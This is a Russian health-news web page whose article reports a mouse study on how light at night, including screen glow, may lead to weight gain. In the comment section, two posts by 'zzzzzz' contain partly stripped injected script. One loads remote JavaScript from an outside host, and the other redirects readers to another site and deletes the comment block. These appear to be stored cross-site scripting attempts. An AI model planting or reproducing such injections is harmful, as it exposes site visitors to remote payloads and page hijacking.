Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Даже свет во сне приводит...  >>  Даже свет во сне приводит к лишним килограммам! Как похудеть?!
 
Обратная связь
 

Даже свет во сне приводит к лишним килограммам! Как похудеть?!

Размер шрифта
12 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Мы не откроем Америку, если скажем, что сладости, фаст фуд и прочие источники пустых калорий – прямой путь к ожирению. Чуть менее известный факт: импульсивные личности более склонны к набору лишнего веса. Неожиданно? Что ж, приготовьтесь удивиться еще больше: ваш компьютер совсем не делает вас стройнее, а наоборот!

Даже свет во сне приводит к лишним килограммам! Как похудеть?!

Если вы подумали о малоподвижном образе жизни – бросьте! Это, конечно, правильно, но мы не собираемся потчевать вас такими банальностями.

Речь идет совсем о другом – о вашей привычке засиживаться в «Одноклассниках» перед сном.

Группы ученых из университета Огайо (США) во главе с доктором Лорой Фонкен обнаружили, что использование компьютера, планшета или смартфона на ночь глядя может добавить вам пару-тройку лишних сантиметров в талии. То же самое касается и яркого света – в вечернее время суток он становится заклятым врагом вашей стройности.

Ученые провели серию экспериментов на мышах. Те из них, что были подвержены воздействию яркого света в ночные часы, в дальнейшем в два раза чаще набирали лишний вес, если сравнивать с теми животными, которые преспокойно засыпали в темноте. При этом всех мышей на протяжении экспериментального периода (восемь недель) кормили абсолютно одинаковым кормом.

Удивительно, но для достижения вышеописанного пагубного эффекта отнюдь не понадобился армейский прожектор: ученые обнаружили, что достаточно минимальной интенсивности света – сопоставимой со свечением экрана вашего ноутбука или телевизора.

Авторы считают, что этот феномен связан с изменением пищевого поведения, которое следует в ответ на вмешательство в естественный световой режим.

«В нашем эксперименте мыши, которые были подвержены воздействию света в ночные часы, начинали есть больше во время периода отдыха; именно с этим, по всей видимости, связан набор веса», – рассказывает доктор Фонкен.

Аналогичный механизм вполне может сработать и с человеком. Ведь наш организм функционирует в строгом соответствии с суточными ритмами, которые четко диктуют нам: ночью должно быть темно, ночь – период отдыха для глаз и для разума. Воздействие яркого света в эти часы может внести сбой в работу наших внутренних часов, что в том числе может отразиться и на аппетите.

Засим, доктор Фонкен рекомендуется воздержаться от использования электронных гаджетов перед сном. Если это выше ваших сил, уж хотя бы снизьте яркость до минимума.

Мы, со своей стороны, можем лишь присоединиться к этим рекомендациям.

Другие материалы о снижении веса ищите на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:53

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.